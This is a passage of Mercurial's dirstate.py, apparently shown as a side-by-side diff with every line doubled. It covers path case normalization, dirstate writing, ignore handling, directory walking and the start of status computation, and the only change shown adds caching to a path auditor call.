669 folded = d + "/" + f
669 folded = d + "/" + f
670 else:
670 else:
671 # No path components, preserve original case
671 # No path components, preserve original case
672 folded = path
672 folded = path
673 else:
673 else:
674 # recursively normalize leading directory components
674 # recursively normalize leading directory components
675 # against dirstate
675 # against dirstate
676 if '/' in normed:
676 if '/' in normed:
677 d, f = normed.rsplit('/', 1)
677 d, f = normed.rsplit('/', 1)
678 d = self._normalize(d, False, ignoremissing, True)
678 d = self._normalize(d, False, ignoremissing, True)
679 r = self._root + "/" + d
679 r = self._root + "/" + d
680 folded = d + "/" + util.fspath(f, r)
680 folded = d + "/" + util.fspath(f, r)
681 else:
681 else:
682 folded = util.fspath(normed, self._root)
682 folded = util.fspath(normed, self._root)
683 storemap[normed] = folded
683 storemap[normed] = folded
684
684
685 return folded
685 return folded
686
686
687 def _normalizefile(self, path, isknown, ignoremissing=False, exists=None):
687 def _normalizefile(self, path, isknown, ignoremissing=False, exists=None):
688 normed = util.normcase(path)
688 normed = util.normcase(path)
689 folded = self._filefoldmap.get(normed, None)
689 folded = self._filefoldmap.get(normed, None)
690 if folded is None:
690 if folded is None:
691 if isknown:
691 if isknown:
692 folded = path
692 folded = path
693 else:
693 else:
694 folded = self._discoverpath(path, normed, ignoremissing, exists,
694 folded = self._discoverpath(path, normed, ignoremissing, exists,
695 self._filefoldmap)
695 self._filefoldmap)
696 return folded
696 return folded
697
697
698 def _normalize(self, path, isknown, ignoremissing=False, exists=None):
698 def _normalize(self, path, isknown, ignoremissing=False, exists=None):
699 normed = util.normcase(path)
699 normed = util.normcase(path)
700 folded = self._filefoldmap.get(normed, None)
700 folded = self._filefoldmap.get(normed, None)
701 if folded is None:
701 if folded is None:
702 folded = self._dirfoldmap.get(normed, None)
702 folded = self._dirfoldmap.get(normed, None)
703 if folded is None:
703 if folded is None:
704 if isknown:
704 if isknown:
705 folded = path
705 folded = path
706 else:
706 else:
707 # store discovered result in dirfoldmap so that future
707 # store discovered result in dirfoldmap so that future
708 # normalizefile calls don't start matching directories
708 # normalizefile calls don't start matching directories
709 folded = self._discoverpath(path, normed, ignoremissing, exists,
709 folded = self._discoverpath(path, normed, ignoremissing, exists,
710 self._dirfoldmap)
710 self._dirfoldmap)
711 return folded
711 return folded
712
712
713 def normalize(self, path, isknown=False, ignoremissing=False):
713 def normalize(self, path, isknown=False, ignoremissing=False):
714 '''
714 '''
715 normalize the case of a pathname when on a casefolding filesystem
715 normalize the case of a pathname when on a casefolding filesystem
716
716
717 isknown specifies whether the filename came from walking the
717 isknown specifies whether the filename came from walking the
718 disk, to avoid extra filesystem access.
718 disk, to avoid extra filesystem access.
719
719
720 If ignoremissing is True, missing path are returned
720 If ignoremissing is True, missing path are returned
721 unchanged. Otherwise, we try harder to normalize possibly
721 unchanged. Otherwise, we try harder to normalize possibly
722 existing path components.
722 existing path components.
723
723
724 The normalized case is determined based on the following precedence:
724 The normalized case is determined based on the following precedence:
725
725
726 - version of name already stored in the dirstate
726 - version of name already stored in the dirstate
727 - version of name stored on disk
727 - version of name stored on disk
728 - version provided via command arguments
728 - version provided via command arguments
729 '''
729 '''
730
730
731 if self._checkcase:
731 if self._checkcase:
732 return self._normalize(path, isknown, ignoremissing)
732 return self._normalize(path, isknown, ignoremissing)
733 return path
733 return path
734
734
735 def clear(self):
735 def clear(self):
736 self._map = {}
736 self._map = {}
737 self._nonnormalset = set()
737 self._nonnormalset = set()
738 self._otherparentset = set()
738 self._otherparentset = set()
739 if "_dirs" in self.__dict__:
739 if "_dirs" in self.__dict__:
740 delattr(self, "_dirs")
740 delattr(self, "_dirs")
741 self._copymap = {}
741 self._copymap = {}
742 self._pl = [nullid, nullid]
742 self._pl = [nullid, nullid]
743 self._lastnormaltime = 0
743 self._lastnormaltime = 0
744 self._updatedfiles.clear()
744 self._updatedfiles.clear()
745 self._dirty = True
745 self._dirty = True
746
746
747 def rebuild(self, parent, allfiles, changedfiles=None):
747 def rebuild(self, parent, allfiles, changedfiles=None):
748 if changedfiles is None:
748 if changedfiles is None:
749 # Rebuild entire dirstate
749 # Rebuild entire dirstate
750 changedfiles = allfiles
750 changedfiles = allfiles
751 lastnormaltime = self._lastnormaltime
751 lastnormaltime = self._lastnormaltime
752 self.clear()
752 self.clear()
753 self._lastnormaltime = lastnormaltime
753 self._lastnormaltime = lastnormaltime
754
754
755 if self._origpl is None:
755 if self._origpl is None:
756 self._origpl = self._pl
756 self._origpl = self._pl
757 self._pl = (parent, nullid)
757 self._pl = (parent, nullid)
758 for f in changedfiles:
758 for f in changedfiles:
759 if f in allfiles:
759 if f in allfiles:
760 self.normallookup(f)
760 self.normallookup(f)
761 else:
761 else:
762 self.drop(f)
762 self.drop(f)
763
763
764 self._dirty = True
764 self._dirty = True
765
765
766 def identity(self):
766 def identity(self):
767 '''Return identity of dirstate itself to detect changing in storage
767 '''Return identity of dirstate itself to detect changing in storage
768
768
769 If identity of previous dirstate is equal to this, writing
769 If identity of previous dirstate is equal to this, writing
770 changes based on the former dirstate out can keep consistency.
770 changes based on the former dirstate out can keep consistency.
771 '''
771 '''
772 return self._identity
772 return self._identity
773
773
774 def write(self, tr):
774 def write(self, tr):
775 if not self._dirty:
775 if not self._dirty:
776 return
776 return
777
777
778 filename = self._filename
778 filename = self._filename
779 if tr:
779 if tr:
780 # 'dirstate.write()' is not only for writing in-memory
780 # 'dirstate.write()' is not only for writing in-memory
781 # changes out, but also for dropping ambiguous timestamp.
781 # changes out, but also for dropping ambiguous timestamp.
782 # delayed writing re-raise "ambiguous timestamp issue".
782 # delayed writing re-raise "ambiguous timestamp issue".
783 # See also the wiki page below for detail:
783 # See also the wiki page below for detail:
784 # https://www.mercurial-scm.org/wiki/DirstateTransactionPlan
784 # https://www.mercurial-scm.org/wiki/DirstateTransactionPlan
785
785
786 # emulate dropping timestamp in 'parsers.pack_dirstate'
786 # emulate dropping timestamp in 'parsers.pack_dirstate'
787 now = _getfsnow(self._opener)
787 now = _getfsnow(self._opener)
788 dmap = self._map
788 dmap = self._map
789 for f in self._updatedfiles:
789 for f in self._updatedfiles:
790 e = dmap.get(f)
790 e = dmap.get(f)
791 if e is not None and e[0] == 'n' and e[3] == now:
791 if e is not None and e[0] == 'n' and e[3] == now:
792 dmap[f] = dirstatetuple(e[0], e[1], e[2], -1)
792 dmap[f] = dirstatetuple(e[0], e[1], e[2], -1)
793 self._nonnormalset.add(f)
793 self._nonnormalset.add(f)
794
794
795 # emulate that all 'dirstate.normal' results are written out
795 # emulate that all 'dirstate.normal' results are written out
796 self._lastnormaltime = 0
796 self._lastnormaltime = 0
797 self._updatedfiles.clear()
797 self._updatedfiles.clear()
798
798
799 # delay writing in-memory changes out
799 # delay writing in-memory changes out
800 tr.addfilegenerator('dirstate', (self._filename,),
800 tr.addfilegenerator('dirstate', (self._filename,),
801 self._writedirstate, location='plain')
801 self._writedirstate, location='plain')
802 return
802 return
803
803
804 st = self._opener(filename, "w", atomictemp=True, checkambig=True)
804 st = self._opener(filename, "w", atomictemp=True, checkambig=True)
805 self._writedirstate(st)
805 self._writedirstate(st)
806
806
807 def addparentchangecallback(self, category, callback):
807 def addparentchangecallback(self, category, callback):
808 """add a callback to be called when the wd parents are changed
808 """add a callback to be called when the wd parents are changed
809
809
810 Callback will be called with the following arguments:
810 Callback will be called with the following arguments:
811 dirstate, (oldp1, oldp2), (newp1, newp2)
811 dirstate, (oldp1, oldp2), (newp1, newp2)
812
812
813 Category is a unique identifier to allow overwriting an old callback
813 Category is a unique identifier to allow overwriting an old callback
814 with a newer callback.
814 with a newer callback.
815 """
815 """
816 self._plchangecallbacks[category] = callback
816 self._plchangecallbacks[category] = callback
817
817
818 def _writedirstate(self, st):
818 def _writedirstate(self, st):
819 # notify callbacks about parents change
819 # notify callbacks about parents change
820 if self._origpl is not None and self._origpl != self._pl:
820 if self._origpl is not None and self._origpl != self._pl:
821 for c, callback in sorted(self._plchangecallbacks.iteritems()):
821 for c, callback in sorted(self._plchangecallbacks.iteritems()):
822 callback(self, self._origpl, self._pl)
822 callback(self, self._origpl, self._pl)
823 self._origpl = None
823 self._origpl = None
824 # use the modification time of the newly created temporary file as the
824 # use the modification time of the newly created temporary file as the
825 # filesystem's notion of 'now'
825 # filesystem's notion of 'now'
826 now = util.fstat(st).st_mtime & _rangemask
826 now = util.fstat(st).st_mtime & _rangemask
827
827
828 # enough 'delaywrite' prevents 'pack_dirstate' from dropping
828 # enough 'delaywrite' prevents 'pack_dirstate' from dropping
829 # timestamp of each entries in dirstate, because of 'now > mtime'
829 # timestamp of each entries in dirstate, because of 'now > mtime'
830 delaywrite = self._ui.configint('debug', 'dirstate.delaywrite', 0)
830 delaywrite = self._ui.configint('debug', 'dirstate.delaywrite', 0)
831 if delaywrite > 0:
831 if delaywrite > 0:
832 # do we have any files to delay for?
832 # do we have any files to delay for?
833 for f, e in self._map.iteritems():
833 for f, e in self._map.iteritems():
834 if e[0] == 'n' and e[3] == now:
834 if e[0] == 'n' and e[3] == now:
835 import time # to avoid useless import
835 import time # to avoid useless import
836 # rather than sleep n seconds, sleep until the next
836 # rather than sleep n seconds, sleep until the next
837 # multiple of n seconds
837 # multiple of n seconds
838 clock = time.time()
838 clock = time.time()
839 start = int(clock) - (int(clock) % delaywrite)
839 start = int(clock) - (int(clock) % delaywrite)
840 end = start + delaywrite
840 end = start + delaywrite
841 time.sleep(end - clock)
841 time.sleep(end - clock)
842 now = end # trust our estimate that the end is near now
842 now = end # trust our estimate that the end is near now
843 break
843 break
844
844
845 st.write(parsers.pack_dirstate(self._map, self._copymap, self._pl, now))
845 st.write(parsers.pack_dirstate(self._map, self._copymap, self._pl, now))
846 self._nonnormalset, self._otherparentset = nonnormalentries(self._map)
846 self._nonnormalset, self._otherparentset = nonnormalentries(self._map)
847 st.close()
847 st.close()
848 self._lastnormaltime = 0
848 self._lastnormaltime = 0
849 self._dirty = self._dirtypl = False
849 self._dirty = self._dirtypl = False
850
850
851 def _dirignore(self, f):
851 def _dirignore(self, f):
852 if f == '.':
852 if f == '.':
853 return False
853 return False
854 if self._ignore(f):
854 if self._ignore(f):
855 return True
855 return True
856 for p in util.finddirs(f):
856 for p in util.finddirs(f):
857 if self._ignore(p):
857 if self._ignore(p):
858 return True
858 return True
859 return False
859 return False
860
860
861 def _ignorefiles(self):
861 def _ignorefiles(self):
862 files = []
862 files = []
863 if os.path.exists(self._join('.hgignore')):
863 if os.path.exists(self._join('.hgignore')):
864 files.append(self._join('.hgignore'))
864 files.append(self._join('.hgignore'))
865 for name, path in self._ui.configitems("ui"):
865 for name, path in self._ui.configitems("ui"):
866 if name == 'ignore' or name.startswith('ignore.'):
866 if name == 'ignore' or name.startswith('ignore.'):
867 # we need to use os.path.join here rather than self._join
867 # we need to use os.path.join here rather than self._join
868 # because path is arbitrary and user-specified
868 # because path is arbitrary and user-specified
869 files.append(os.path.join(self._rootdir, util.expandpath(path)))
869 files.append(os.path.join(self._rootdir, util.expandpath(path)))
870 return files
870 return files
871
871
872 def _ignorefileandline(self, f):
872 def _ignorefileandline(self, f):
873 files = collections.deque(self._ignorefiles())
873 files = collections.deque(self._ignorefiles())
874 visited = set()
874 visited = set()
875 while files:
875 while files:
876 i = files.popleft()
876 i = files.popleft()
877 patterns = matchmod.readpatternfile(i, self._ui.warn,
877 patterns = matchmod.readpatternfile(i, self._ui.warn,
878 sourceinfo=True)
878 sourceinfo=True)
879 for pattern, lineno, line in patterns:
879 for pattern, lineno, line in patterns:
880 kind, p = matchmod._patsplit(pattern, 'glob')
880 kind, p = matchmod._patsplit(pattern, 'glob')
881 if kind == "subinclude":
881 if kind == "subinclude":
882 if p not in visited:
882 if p not in visited:
883 files.append(p)
883 files.append(p)
884 continue
884 continue
885 m = matchmod.match(self._root, '', [], [pattern],
885 m = matchmod.match(self._root, '', [], [pattern],
886 warn=self._ui.warn)
886 warn=self._ui.warn)
887 if m(f):
887 if m(f):
888 return (i, lineno, line)
888 return (i, lineno, line)
889 visited.add(i)
889 visited.add(i)
890 return (None, -1, "")
890 return (None, -1, "")
891
891
892 def _walkexplicit(self, match, subrepos):
892 def _walkexplicit(self, match, subrepos):
893 '''Get stat data about the files explicitly specified by match.
893 '''Get stat data about the files explicitly specified by match.
894
894
895 Return a triple (results, dirsfound, dirsnotfound).
895 Return a triple (results, dirsfound, dirsnotfound).
896 - results is a mapping from filename to stat result. It also contains
896 - results is a mapping from filename to stat result. It also contains
897 listings mapping subrepos and .hg to None.
897 listings mapping subrepos and .hg to None.
898 - dirsfound is a list of files found to be directories.
898 - dirsfound is a list of files found to be directories.
899 - dirsnotfound is a list of files that the dirstate thinks are
899 - dirsnotfound is a list of files that the dirstate thinks are
900 directories and that were not found.'''
900 directories and that were not found.'''
901
901
902 def badtype(mode):
902 def badtype(mode):
903 kind = _('unknown')
903 kind = _('unknown')
904 if stat.S_ISCHR(mode):
904 if stat.S_ISCHR(mode):
905 kind = _('character device')
905 kind = _('character device')
906 elif stat.S_ISBLK(mode):
906 elif stat.S_ISBLK(mode):
907 kind = _('block device')
907 kind = _('block device')
908 elif stat.S_ISFIFO(mode):
908 elif stat.S_ISFIFO(mode):
909 kind = _('fifo')
909 kind = _('fifo')
910 elif stat.S_ISSOCK(mode):
910 elif stat.S_ISSOCK(mode):
911 kind = _('socket')
911 kind = _('socket')
912 elif stat.S_ISDIR(mode):
912 elif stat.S_ISDIR(mode):
913 kind = _('directory')
913 kind = _('directory')
914 return _('unsupported file type (type is %s)') % kind
914 return _('unsupported file type (type is %s)') % kind
915
915
916 matchedir = match.explicitdir
916 matchedir = match.explicitdir
917 badfn = match.bad
917 badfn = match.bad
918 dmap = self._map
918 dmap = self._map
919 lstat = os.lstat
919 lstat = os.lstat
920 getkind = stat.S_IFMT
920 getkind = stat.S_IFMT
921 dirkind = stat.S_IFDIR
921 dirkind = stat.S_IFDIR
922 regkind = stat.S_IFREG
922 regkind = stat.S_IFREG
923 lnkkind = stat.S_IFLNK
923 lnkkind = stat.S_IFLNK
924 join = self._join
924 join = self._join
925 dirsfound = []
925 dirsfound = []
926 foundadd = dirsfound.append
926 foundadd = dirsfound.append
927 dirsnotfound = []
927 dirsnotfound = []
928 notfoundadd = dirsnotfound.append
928 notfoundadd = dirsnotfound.append
929
929
930 if not match.isexact() and self._checkcase:
930 if not match.isexact() and self._checkcase:
931 normalize = self._normalize
931 normalize = self._normalize
932 else:
932 else:
933 normalize = None
933 normalize = None
934
934
935 files = sorted(match.files())
935 files = sorted(match.files())
936 subrepos.sort()
936 subrepos.sort()
937 i, j = 0, 0
937 i, j = 0, 0
938 while i < len(files) and j < len(subrepos):
938 while i < len(files) and j < len(subrepos):
939 subpath = subrepos[j] + "/"
939 subpath = subrepos[j] + "/"
940 if files[i] < subpath:
940 if files[i] < subpath:
941 i += 1
941 i += 1
942 continue
942 continue
943 while i < len(files) and files[i].startswith(subpath):
943 while i < len(files) and files[i].startswith(subpath):
944 del files[i]
944 del files[i]
945 j += 1
945 j += 1
946
946
947 if not files or '.' in files:
947 if not files or '.' in files:
948 files = ['.']
948 files = ['.']
949 results = dict.fromkeys(subrepos)
949 results = dict.fromkeys(subrepos)
950 results['.hg'] = None
950 results['.hg'] = None
951
951
952 alldirs = None
952 alldirs = None
953 for ff in files:
953 for ff in files:
954 # constructing the foldmap is expensive, so don't do it for the
954 # constructing the foldmap is expensive, so don't do it for the
955 # common case where files is ['.']
955 # common case where files is ['.']
956 if normalize and ff != '.':
956 if normalize and ff != '.':
957 nf = normalize(ff, False, True)
957 nf = normalize(ff, False, True)
958 else:
958 else:
959 nf = ff
959 nf = ff
960 if nf in results:
960 if nf in results:
961 continue
961 continue
962
962
963 try:
963 try:
964 st = lstat(join(nf))
964 st = lstat(join(nf))
965 kind = getkind(st.st_mode)
965 kind = getkind(st.st_mode)
966 if kind == dirkind:
966 if kind == dirkind:
967 if nf in dmap:
967 if nf in dmap:
968 # file replaced by dir on disk but still in dirstate
968 # file replaced by dir on disk but still in dirstate
969 results[nf] = None
969 results[nf] = None
970 if matchedir:
970 if matchedir:
971 matchedir(nf)
971 matchedir(nf)
972 foundadd((nf, ff))
972 foundadd((nf, ff))
973 elif kind == regkind or kind == lnkkind:
973 elif kind == regkind or kind == lnkkind:
974 results[nf] = st
974 results[nf] = st
975 else:
975 else:
976 badfn(ff, badtype(kind))
976 badfn(ff, badtype(kind))
977 if nf in dmap:
977 if nf in dmap:
978 results[nf] = None
978 results[nf] = None
979 except OSError as inst: # nf not found on disk - it is dirstate only
979 except OSError as inst: # nf not found on disk - it is dirstate only
980 if nf in dmap: # does it exactly match a missing file?
980 if nf in dmap: # does it exactly match a missing file?
981 results[nf] = None
981 results[nf] = None
982 else: # does it match a missing directory?
982 else: # does it match a missing directory?
983 if alldirs is None:
983 if alldirs is None:
984 alldirs = util.dirs(dmap)
984 alldirs = util.dirs(dmap)
985 if nf in alldirs:
985 if nf in alldirs:
986 if matchedir:
986 if matchedir:
987 matchedir(nf)
987 matchedir(nf)
988 notfoundadd(nf)
988 notfoundadd(nf)
989 else:
989 else:
990 badfn(ff, inst.strerror)
990 badfn(ff, inst.strerror)
991
991
992 # Case insensitive filesystems cannot rely on lstat() failing to detect
992 # Case insensitive filesystems cannot rely on lstat() failing to detect
993 # a case-only rename. Prune the stat object for any file that does not
993 # a case-only rename. Prune the stat object for any file that does not
994 # match the case in the filesystem, if there are multiple files that
994 # match the case in the filesystem, if there are multiple files that
995 # normalize to the same path.
995 # normalize to the same path.
996 if match.isexact() and self._checkcase:
996 if match.isexact() and self._checkcase:
997 normed = {}
997 normed = {}
998
998
999 for f, st in results.iteritems():
999 for f, st in results.iteritems():
1000 if st is None:
1000 if st is None:
1001 continue
1001 continue
1002
1002
1003 nc = util.normcase(f)
1003 nc = util.normcase(f)
1004 paths = normed.get(nc)
1004 paths = normed.get(nc)
1005
1005
1006 if paths is None:
1006 if paths is None:
1007 paths = set()
1007 paths = set()
1008 normed[nc] = paths
1008 normed[nc] = paths
1009
1009
1010 paths.add(f)
1010 paths.add(f)
1011
1011
1012 for norm, paths in normed.iteritems():
1012 for norm, paths in normed.iteritems():
1013 if len(paths) > 1:
1013 if len(paths) > 1:
1014 for path in paths:
1014 for path in paths:
1015 folded = self._discoverpath(path, norm, True, None,
1015 folded = self._discoverpath(path, norm, True, None,
1016 self._dirfoldmap)
1016 self._dirfoldmap)
1017 if path != folded:
1017 if path != folded:
1018 results[path] = None
1018 results[path] = None
1019
1019
1020 return results, dirsfound, dirsnotfound
1020 return results, dirsfound, dirsnotfound
1021
1021
1022 def walk(self, match, subrepos, unknown, ignored, full=True):
1022 def walk(self, match, subrepos, unknown, ignored, full=True):
1023 '''
1023 '''
1024 Walk recursively through the directory tree, finding all files
1024 Walk recursively through the directory tree, finding all files
1025 matched by match.
1025 matched by match.
1026
1026
1027 If full is False, maybe skip some known-clean files.
1027 If full is False, maybe skip some known-clean files.
1028
1028
1029 Return a dict mapping filename to stat-like object (either
1029 Return a dict mapping filename to stat-like object (either
1030 mercurial.osutil.stat instance or return value of os.stat()).
1030 mercurial.osutil.stat instance or return value of os.stat()).
1031
1031
1032 '''
1032 '''
1033 # full is a flag that extensions that hook into walk can use -- this
1033 # full is a flag that extensions that hook into walk can use -- this
1034 # implementation doesn't use it at all. This satisfies the contract
1034 # implementation doesn't use it at all. This satisfies the contract
1035 # because we only guarantee a "maybe".
1035 # because we only guarantee a "maybe".
1036
1036
1037 if ignored:
1037 if ignored:
1038 ignore = util.never
1038 ignore = util.never
1039 dirignore = util.never
1039 dirignore = util.never
1040 elif unknown:
1040 elif unknown:
1041 ignore = self._ignore
1041 ignore = self._ignore
1042 dirignore = self._dirignore
1042 dirignore = self._dirignore
1043 else:
1043 else:
1044 # if not unknown and not ignored, drop dir recursion and step 2
1044 # if not unknown and not ignored, drop dir recursion and step 2
1045 ignore = util.always
1045 ignore = util.always
1046 dirignore = util.always
1046 dirignore = util.always
1047
1047
1048 matchfn = match.matchfn
1048 matchfn = match.matchfn
1049 matchalways = match.always()
1049 matchalways = match.always()
1050 matchtdir = match.traversedir
1050 matchtdir = match.traversedir
1051 dmap = self._map
1051 dmap = self._map
1052 listdir = util.listdir
1052 listdir = util.listdir
1053 lstat = os.lstat
1053 lstat = os.lstat
1054 dirkind = stat.S_IFDIR
1054 dirkind = stat.S_IFDIR
1055 regkind = stat.S_IFREG
1055 regkind = stat.S_IFREG
1056 lnkkind = stat.S_IFLNK
1056 lnkkind = stat.S_IFLNK
1057 join = self._join
1057 join = self._join
1058
1058
1059 exact = skipstep3 = False
1059 exact = skipstep3 = False
1060 if match.isexact(): # match.exact
1060 if match.isexact(): # match.exact
1061 exact = True
1061 exact = True
1062 dirignore = util.always # skip step 2
1062 dirignore = util.always # skip step 2
1063 elif match.prefix(): # match.match, no patterns
1063 elif match.prefix(): # match.match, no patterns
1064 skipstep3 = True
1064 skipstep3 = True
1065
1065
1066 if not exact and self._checkcase:
1066 if not exact and self._checkcase:
1067 normalize = self._normalize
1067 normalize = self._normalize
1068 normalizefile = self._normalizefile
1068 normalizefile = self._normalizefile
1069 skipstep3 = False
1069 skipstep3 = False
1070 else:
1070 else:
1071 normalize = self._normalize
1071 normalize = self._normalize
1072 normalizefile = None
1072 normalizefile = None
1073
1073
1074 # step 1: find all explicit files
1074 # step 1: find all explicit files
1075 results, work, dirsnotfound = self._walkexplicit(match, subrepos)
1075 results, work, dirsnotfound = self._walkexplicit(match, subrepos)
1076
1076
1077 skipstep3 = skipstep3 and not (work or dirsnotfound)
1077 skipstep3 = skipstep3 and not (work or dirsnotfound)
1078 work = [d for d in work if not dirignore(d[0])]
1078 work = [d for d in work if not dirignore(d[0])]
1079
1079
1080 # step 2: visit subdirectories
1080 # step 2: visit subdirectories
1081 def traverse(work, alreadynormed):
1081 def traverse(work, alreadynormed):
1082 wadd = work.append
1082 wadd = work.append
1083 while work:
1083 while work:
1084 nd = work.pop()
1084 nd = work.pop()
1085 if not match.visitdir(nd):
1085 if not match.visitdir(nd):
1086 continue
1086 continue
1087 skip = None
1087 skip = None
1088 if nd == '.':
1088 if nd == '.':
1089 nd = ''
1089 nd = ''
1090 else:
1090 else:
1091 skip = '.hg'
1091 skip = '.hg'
1092 try:
1092 try:
1093 entries = listdir(join(nd), stat=True, skip=skip)
1093 entries = listdir(join(nd), stat=True, skip=skip)
1094 except OSError as inst:
1094 except OSError as inst:
1095 if inst.errno in (errno.EACCES, errno.ENOENT):
1095 if inst.errno in (errno.EACCES, errno.ENOENT):
1096 match.bad(self.pathto(nd), inst.strerror)
1096 match.bad(self.pathto(nd), inst.strerror)
1097 continue
1097 continue
1098 raise
1098 raise
1099 for f, kind, st in entries:
1099 for f, kind, st in entries:
1100 if normalizefile:
1100 if normalizefile:
1101 # even though f might be a directory, we're only
1101 # even though f might be a directory, we're only
1102 # interested in comparing it to files currently in the
1102 # interested in comparing it to files currently in the
1103 # dmap -- therefore normalizefile is enough
1103 # dmap -- therefore normalizefile is enough
1104 nf = normalizefile(nd and (nd + "/" + f) or f, True,
1104 nf = normalizefile(nd and (nd + "/" + f) or f, True,
1105 True)
1105 True)
1106 else:
1106 else:
1107 nf = nd and (nd + "/" + f) or f
1107 nf = nd and (nd + "/" + f) or f
1108 if nf not in results:
1108 if nf not in results:
1109 if kind == dirkind:
1109 if kind == dirkind:
1110 if not ignore(nf):
1110 if not ignore(nf):
1111 if matchtdir:
1111 if matchtdir:
1112 matchtdir(nf)
1112 matchtdir(nf)
1113 wadd(nf)
1113 wadd(nf)
1114 if nf in dmap and (matchalways or matchfn(nf)):
1114 if nf in dmap and (matchalways or matchfn(nf)):
1115 results[nf] = None
1115 results[nf] = None
1116 elif kind == regkind or kind == lnkkind:
1116 elif kind == regkind or kind == lnkkind:
1117 if nf in dmap:
1117 if nf in dmap:
1118 if matchalways or matchfn(nf):
1118 if matchalways or matchfn(nf):
1119 results[nf] = st
1119 results[nf] = st
1120 elif ((matchalways or matchfn(nf))
1120 elif ((matchalways or matchfn(nf))
1121 and not ignore(nf)):
1121 and not ignore(nf)):
1122 # unknown file -- normalize if necessary
1122 # unknown file -- normalize if necessary
1123 if not alreadynormed:
1123 if not alreadynormed:
1124 nf = normalize(nf, False, True)
1124 nf = normalize(nf, False, True)
1125 results[nf] = st
1125 results[nf] = st
1126 elif nf in dmap and (matchalways or matchfn(nf)):
1126 elif nf in dmap and (matchalways or matchfn(nf)):
1127 results[nf] = None
1127 results[nf] = None
1128
1128
1129 for nd, d in work:
1129 for nd, d in work:
1130 # alreadynormed means that processwork doesn't have to do any
1130 # alreadynormed means that processwork doesn't have to do any
1131 # expensive directory normalization
1131 # expensive directory normalization
1132 alreadynormed = not normalize or nd == d
1132 alreadynormed = not normalize or nd == d
1133 traverse([d], alreadynormed)
1133 traverse([d], alreadynormed)
1134
1134
1135 for s in subrepos:
1135 for s in subrepos:
1136 del results[s]
1136 del results[s]
1137 del results['.hg']
1137 del results['.hg']
1138
1138
1139 # step 3: visit remaining files from dmap
1139 # step 3: visit remaining files from dmap
1140 if not skipstep3 and not exact:
1140 if not skipstep3 and not exact:
1141 # If a dmap file is not in results yet, it was either
1141 # If a dmap file is not in results yet, it was either
1142 # a) not matching matchfn b) ignored, c) missing, or d) under a
1142 # a) not matching matchfn b) ignored, c) missing, or d) under a
1143 # symlink directory.
1143 # symlink directory.
1144 if not results and matchalways:
1144 if not results and matchalways:
1145 visit = [f for f in dmap]
1145 visit = [f for f in dmap]
1146 else:
1146 else:
1147 visit = [f for f in dmap if f not in results and matchfn(f)]
1147 visit = [f for f in dmap if f not in results and matchfn(f)]
1148 visit.sort()
1148 visit.sort()
1149
1149
1150 if unknown:
1150 if unknown:
1151 # unknown == True means we walked all dirs under the roots
1151 # unknown == True means we walked all dirs under the roots
1152 # that wasn't ignored, and everything that matched was stat'ed
1152 # that wasn't ignored, and everything that matched was stat'ed
1153 # and is already in results.
1153 # and is already in results.
1154 # The rest must thus be ignored or under a symlink.
1154 # The rest must thus be ignored or under a symlink.
1155 audit_path = pathutil.pathauditor(self._root)
1155 audit_path = pathutil.pathauditor(self._root, cached=True)
1156
1156
1157 for nf in iter(visit):
1157 for nf in iter(visit):
1158 # If a stat for the same file was already added with a
1158 # If a stat for the same file was already added with a
1159 # different case, don't add one for this, since that would
1159 # different case, don't add one for this, since that would
1160 # make it appear as if the file exists under both names
1160 # make it appear as if the file exists under both names
1161 # on disk.
1161 # on disk.
1162 if (normalizefile and
1162 if (normalizefile and
1163 normalizefile(nf, True, True) in results):
1163 normalizefile(nf, True, True) in results):
1164 results[nf] = None
1164 results[nf] = None
1165 # Report ignored items in the dmap as long as they are not
1165 # Report ignored items in the dmap as long as they are not
1166 # under a symlink directory.
1166 # under a symlink directory.
1167 elif audit_path.check(nf):
1167 elif audit_path.check(nf):
1168 try:
1168 try:
1169 results[nf] = lstat(join(nf))
1169 results[nf] = lstat(join(nf))
1170 # file was just ignored, no links, and exists
1170 # file was just ignored, no links, and exists
1171 except OSError:
1171 except OSError:
1172 # file doesn't exist
1172 # file doesn't exist
1173 results[nf] = None
1173 results[nf] = None
1174 else:
1174 else:
1175 # It's either missing or under a symlink directory
1175 # It's either missing or under a symlink directory
1176 # which we in this case report as missing
1176 # which we in this case report as missing
1177 results[nf] = None
1177 results[nf] = None
1178 else:
1178 else:
1179 # We may not have walked the full directory tree above,
1179 # We may not have walked the full directory tree above,
1180 # so stat and check everything we missed.
1180 # so stat and check everything we missed.
1181 iv = iter(visit)
1181 iv = iter(visit)
1182 for st in util.statfiles([join(i) for i in visit]):
1182 for st in util.statfiles([join(i) for i in visit]):
1183 results[next(iv)] = st
1183 results[next(iv)] = st
1184 return results
1184 return results
1185
1185
1186 def status(self, match, subrepos, ignored, clean, unknown):
1186 def status(self, match, subrepos, ignored, clean, unknown):
1187 '''Determine the status of the working copy relative to the
1187 '''Determine the status of the working copy relative to the
1188 dirstate and return a pair of (unsure, status), where status is of type
1188 dirstate and return a pair of (unsure, status), where status is of type
1189 scmutil.status and:
1189 scmutil.status and:
1190
1190
1191 unsure:
1191 unsure:
1192 files that might have been modified since the dirstate was
1192 files that might have been modified since the dirstate was
1193 written, but need to be read to be sure (size is the same
1193 written, but need to be read to be sure (size is the same
1194 but mtime differs)
1194 but mtime differs)
1195 status.modified:
1195 status.modified:
1196 files that have definitely been modified since the dirstate
1196 files that have definitely been modified since the dirstate
1197 was written (different size or mode)
1197 was written (different size or mode)
1198 status.clean:
1198 status.clean:
1199 files that have definitely not been modified since the
1199 files that have definitely not been modified since the
1200 dirstate was written
1200 dirstate was written
1201 '''
1201 '''
1202 listignored, listclean, listunknown = ignored, clean, unknown
1202 listignored, listclean, listunknown = ignored, clean, unknown
1203 lookup, modified, added, unknown, ignored = [], [], [], [], []
1203 lookup, modified, added, unknown, ignored = [], [], [], [], []
1204 removed, deleted, clean = [], [], []
1204 removed, deleted, clean = [], [], []
1205
1205
1206 dmap = self._map
1206 dmap = self._map
1207 ladd = lookup.append # aka "unsure"
1207 ladd = lookup.append # aka "unsure"
1208 madd = modified.append
1208 madd = modified.append
1209 aadd = added.append
1209 aadd = added.append
1210 uadd = unknown.append
1210 uadd = unknown.append
1211 iadd = ignored.append
1211 iadd = ignored.append
1212 radd = removed.append
1212 radd = removed.append
1213 dadd = deleted.append
1213 dadd = deleted.append
1214 cadd = clean.append
1214 cadd = clean.append
1215 mexact = match.exact
1215 mexact = match.exact
1216 dirignore = self._dirignore
1216 dirignore = self._dirignore
1217 checkexec = self._checkexec
1217 checkexec = self._checkexec
1218 copymap = self._copymap
1218 copymap = self._copymap
1219 lastnormaltime = self._lastnormaltime
1219 lastnormaltime = self._lastnormaltime
1220
1220
1221 # We need to do full walks when either
1221 # We need to do full walks when either
